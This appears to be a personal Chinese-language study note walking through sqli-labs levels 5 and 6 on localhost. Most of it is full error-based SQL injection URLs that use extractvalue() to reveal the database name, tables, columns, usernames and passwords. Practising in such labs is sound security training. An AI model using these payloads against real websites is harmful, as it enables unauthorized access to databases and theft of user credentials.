讲解一些函数的作用
group_concat()是将所有数据,凑成一行
concat(str1,str2,strx)是将x个字符串给链接在一起
第五关
第一步:测试注入点
第二步:正确之后页面只有一个you are in
第三步:爆破数据库
http://localhost/sqli-labs/Less-5/?id=2135%27%20or%20extractvalue(1,concat(0x7e,database(),0x7e))--+
第四步:爆破数据表
http://localhost/sqli-labs/Less-5/?id=2135%27%20or%20extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1),0x7e))--+
第五步:爆破数据段
http://localhost/sqli-labs/Less-5/?id=2135%27%20or%20extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' limit 0
,1),0x7e))--+
第六步:爆破账号密码
账号:
http://localhost/sqli-labs/Less-5/?id=2135%27%20or%20extractvalue(1,concat(0x7e,(select username from users limit 0
,1),0x7e))--+
第六关
爆破数据库名
http://localhost/sqli-labs/Less-6/?id=11321%22%20or%20extractvalue(1,concat(0x7e,database(),0x7e))--+
爆破表名
http://localhost/sqli-labs/Less-6/?id=11321%22%20or%20extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() limit 0,1),0x7e))--+
爆破字段名(这里删除group_concat的原因是,需要利用limit进行查询字段名)
http://localhost/sqli-labs/Less-6/?id=11321%22%20or%20extractvalue(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name='users' limit 0,1),0x7e))--+
爆破密码
http://localhost/sqli-labs/Less-6/?id=11321%22%20or%20extractvalue(1,concat(0x7e,(select password from users limit 0,1),0x7e))--+
仅为了作者本人学习参考,有错误的地方,请您谅解或者指正。